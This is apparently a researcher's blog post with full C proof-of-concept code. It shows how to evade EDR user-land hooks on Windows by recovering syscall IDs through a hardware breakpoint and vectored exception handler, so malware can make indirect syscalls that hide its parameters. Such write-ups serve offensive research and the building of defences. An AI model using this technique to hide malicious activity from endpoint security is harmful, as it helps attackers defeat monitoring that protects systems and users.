sysCallMe : Another techinque to resolve Syscall ID (SSN)

09 Sep 2024 by @synawk

sysCallMe is a techinque to resolve SSN or syscall ID in Windows using a naive approach. It works basically following the real flow of the hooks in order to get the EAX.

A few months ago, I developed a tool called SysHook (https://github.com/amauricio/syshook/), designed to identify whether a WinAPI function is hooked by an EDR (Endpoint Detection and Response). The tool operates by patching the syscall function, allowing retrieval of the EAX register after traversing the EDR flow. This involves inserting a RET instruction before the syscall, capturing the EAX as it is returned in the RET instruction.

To achieve this, I needed to avoid patching the EDR because it could be detected by analyzing the memory region or by hooking the VirtualProtect function. This is primarily because the syscall memory region is not writable. So basically, I needed a way to follow the EDR flow, and then return to the function that called it to recover the EAX; easy peasy.

Before delving into the code, let’s provide a bit of context on how the EDR works to detect these anomalies. Essentially, the EDR hooks many Nt functions, primarily from ntdll.dll, and modifies the initial instructions (prolog) to redirect the flow to another function. This function is created by the EDR and works specifically for the function that was hooked. For instance, if my malware is using NtWriteVirtualMemory and it’s hooked, the flow will be redirected to the EDR into a function designed specifically for NtWriteVirtualMemory. The reason behind this is that each function has certain definitions, such as parameters, data types, return values, etc. Therefore, in most cases, each function is designed by the EDR to work with a specific WinAPI function.

EDR flow

As you can see, at some point at the end of the EDR analysis, I will have the EAX, which is the SSN or Syscall ID needed to execute the syscall instruction. In a regular flow, I make a call to NtWriteVirtualMemory in the ntdll.dll, which is standard behavior. Of course, if I’m using a payload that I want to hide for some reason, the EDR will be able to read the content of any parameters I pass. So, in some sense, I need to avoid the EDR from seeing the parameters I will use with the function, and the way to do it, of course, is by c.alling the syscall directly, but I need the SSN before.

So, in what way can I avoid calling that? Well, based on my previous tool, I had to patch the syscall instruction with a RET, and then calling NtWriteVirtualMemory would return the answer of the JMP instead of executing the code. But, as I mentioned, that is not a good idea in real bypass scenarios, because it is necessary to use VirtualProtect, which is detectable. So, the solution is basically to call the EDR.NtWriteVirtualMemory first with fake parameters, get the SSN, and finally, call the syscall instruction with the real parameters, but this time using the captured SSN.

redirect flow EDR

The previous image is an example of a user-land hook. When the function NtWriteVirtualMemory (or Zw) is called, the EDR redirects the flow to a custom function inside the EDR module. Inside the EDR, the parameters and their contents are analyzed. Of course, this process could vary between vendors, as each vendor operates in different ways.

EDR function

At the end of the EDR analysis, the EDR must assign the EAX register with the SSN. This occurs within the EDR, just before executing the syscall instruction; at this point, the EAX register is mapped with the syscall ID.

So, the solution follows these steps:

Call the Nt function with fake parameters (e.g., NtWriteVirtualMemory).
Somehow obtain the EAX value just before the syscall instruction.
Finally, implement an indirect syscall using the captured EAX.

Steps 1 and 3 are relatively simple to solve; the challenge lies in step 2—how to obtain the EAX at runtime before the syscall is called and, of course continuing the execution. The solution is to use Hardware Breakpoints.

The flow essentially involves executing the previously mentioned steps. However, as the first step, I need to add a Vectored Exception Handler (VEH) that handles the STATUS_SINGLE_STEP. Then, set up a Hardware Breakpoint in the Nt function + 8, and that’s all.

Calling EDR?

This approach is unusual, given I need to call the EDR to resolve the SSN and it could trace the function itself. However, you should consider that the EDR is constantly reading through syscalls all the benign parameters even if they are not malware. The detection might be based on the AddVectoredExceptionHandler function because it is often considered a suspicious function. Anyway, as a PoC, it works and could be a reason to research deeply the impact of calling EDR to perform bypasses.

 const PVOID handler = AddVectoredExceptionHandler(1, exceptionHandler);

This first line add an exception to the code that points to the function exceptionHandler, inside that function i need to do something like this.

int exceptionHandler(const PEXCEPTION_POINTERS pExceptionInfo){
    if(pExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP){
        printf("EAX: %p\n", pExceptionInfo->ContextRecord->Rax);

        pExceptionInfo->ContextRecord->Rip += 10; //call syscall
        printf("Return address: %p\n", pExceptionInfo->ContextRecord->Rip);

        return EXCEPTION_CONTINUE_EXECUTION;

    }
}

The idea is to trigger this code when reaching the hardware breakpoint. STATUS_SINGLE_STEP indicates a single-step exception, typically used for debugging to signal that the processor has executed one instruction and then triggered an exception. At this exact moment, the JMP in the hook has already executed, and I am receiving the EAX (RAX in x64), so the next line prints the EAX (RAX in x64) with the SSN.

At this point, I already have the SSN in RAX. However, because the EDR modifies the bytes of the syscall stub, I cannot continue from there, as it will contain invalid instructions. Thus, most of the time, after the jump, the EDR goes directly to the SYSCALL instruction in the assembly. For this reason, I add 10 to the RIP to go directly to the syscall instruction. Another reason is that I need to emulate the return of the EDR after the JUMP to fix the CALL STACK after a regular execution flow.

Hardware Breakpoint

After setting up the trap for the exception, its time to create the Hardware breakpoint, for this i am goint to create this code.

void setHardwareBreakpoint(void* address){
    HANDLE hThread;
    CONTEXT ctx;
    const UINT pos = 0;

    do{

        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        hThread = GetCurrentThread();

        if(!GetThreadContext(hThread, &ctx)){
            printf("Error getting thread context\n");
            break;
        }

        ctx.Dr0 = address;
        ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1);
        if(!SetThreadContext(hThread, &ctx)){
            break;
        }

    } while(FALSE);
}

This code is a little bit more complicated, but lets analyze what is happening.

1. Obtaining Thread Context

The function begins by initializing a CONTEXT structure ctx and obtaining the current thread’s context using GetCurrentThread and GetThreadContext. This structure allows direct access to processor state information, including registers like DR0 and DR7.

2. Configuring Debug Registers

ctx.Dr0 = address;: Sets the memory address (address) where you want to set the hardware breakpoint. Dr0 is one of the debug registers specifically used for this purpose. (I am going to set the function that I want to get the SSN)

ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1);: Configures Dr7 to enable and specify the type of breakpoint. Here’s how:

0xF << 16 shifts the hexadecimal value 0xF (binary 1111) 16 bits to the left, resulting in 0xF0000.
~(0xF << 16) performs a bitwise NOT operation, flipping all bits of 0xF0000 to 0xFFFF000F. This clears bits 16-19 of ctx.Dr7.
(ctx.Dr7 & ~(0xF << 16)) preserves the original bits of ctx.Dr7 except for bits 16-19, which are cleared.
| 1 sets bit 0 of ctx.Dr7 to 1, enabling the breakpoint condition.

3. Applying Thread Context

Finally, SetThreadContext(hThread, &ctx): Updates the thread’s context with the modified ctx structure, effectively applying the configured hardware breakpoint.

Final steps

Now, I need to add the hardware breakpoint. In this case, I’m going to use NtQueryInformationProcess as an example.

char* NtQueryInformationProcess = (char *)GetFunctionAddr("NtQueryInformationProcess");

After obtaining the address, I need to pass it as an argument to setHardwareBreakpoint, but adding 0x8 bytes. The reason is that the syscall stub doesn’t start with the jump directly; there are 8 preceding bytes that we need to ignore.

setHardwareBreakpoint(NtQueryInformationProcess + 0x8);

And that’s all. THe result should be something like this.

The complete code is

#include <inttypes.h>
#include <stdint.h>
#include <Windows.h>

#define SIZE_JMP 5
typedef  (NTAPI* __NtWriteVirtualMemory)(
   HANDLE               ProcessHandle,
   PVOID                BaseAddress,
   PVOID                Buffer,
   ULONG                NumberOfBytesToWrite,
   PULONG              NumberOfBytesWritten OPTIONAL );

typedef (NTAPI* __NtQueryInformationProcess)(
     IN HANDLE               ProcessHandle,
  IN PROCESS_INFORMATION_CLASS ProcessInformationClass,
  OUT PVOID               ProcessInformation,
  IN ULONG                ProcessInformationLength,
  OUT PULONG              ReturnLength );

DWORD_PTR GetFunctionAddr(char* function){
    DWORD_PTR addr = (DWORD_PTR)GetProcAddress(GetModuleHandleA("ntdll.dll"), function);
    return addr;
}

void setHardwareBreakpoint(void* address){
    HANDLE hThread;
    CONTEXT ctx;
    DEBUG_EVENT dbgEvent;
    const UINT pos = 0;

    do{

        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

        hThread = GetCurrentThread();

        if(!GetThreadContext(hThread, &ctx)){
            printf("Error getting thread context\n");
            break;
        }

        ctx.Dr0 = address;
        ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1);
        if(!SetThreadContext(hThread, &ctx)){
            break;
        }

    } while(FALSE);
}


int exceptionHandler(const PEXCEPTION_POINTERS pExceptionInfo){
    if(pExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP){
        printf("EAX: %p\n", pExceptionInfo->ContextRecord->Rax);
        pExceptionInfo->ContextRecord->Rip += 10; //call syscall
        printf("Return address: %p\n", pExceptionInfo->ContextRecord->Rip);
        getchar();

        return EXCEPTION_CONTINUE_EXECUTION;

    }
}

typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID Reserved1;
    PVOID PebBaseAddress;
    PVOID Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;

int main(){
    char* mainAddr = (char*)main + 0x40;


    char* NtQueryInformationProcess = (char *)GetFunctionAddr("NtQueryInformationProcess");
    __NtQueryInformationProcess NtQueryInformationProcess_ = (__NtQueryInformationProcess)NtQueryInformationProcess;
    //print 21 bytes


    const PVOID handler = AddVectoredExceptionHandler(1, exceptionHandler);
    setHardwareBreakpoint(NtQueryInformationProcess + 0x8);
    PROCESS_BASIC_INFORMATION pbi;
    DWORD dwSize = 0;
 
    int rr = NtQueryInformationProcess_((HANDLE)-1, 0, &pbi, sizeof(pbi), &dwSize);
    printf("NtQueryInformationProcess: %d\n", rr);
    printf("PEB: %p\n", pbi.PebBaseAddress);
    
  //Here you can use the RAX with indirect or direct syscalls 

    return 0;
}

Conclusion

This is a basic Proof of Concept (PoC) of a technique that I haven’t tested enough to confirm if it can evade all EDRs. However, based on the concept that EDRs are constantly analyzing functions from other applications, this approach could be very useful. The only part that could be easily detected is the hardware breakpoint aspect. With more time for research, this could potentially lead to a more precise technique for evasion in the future.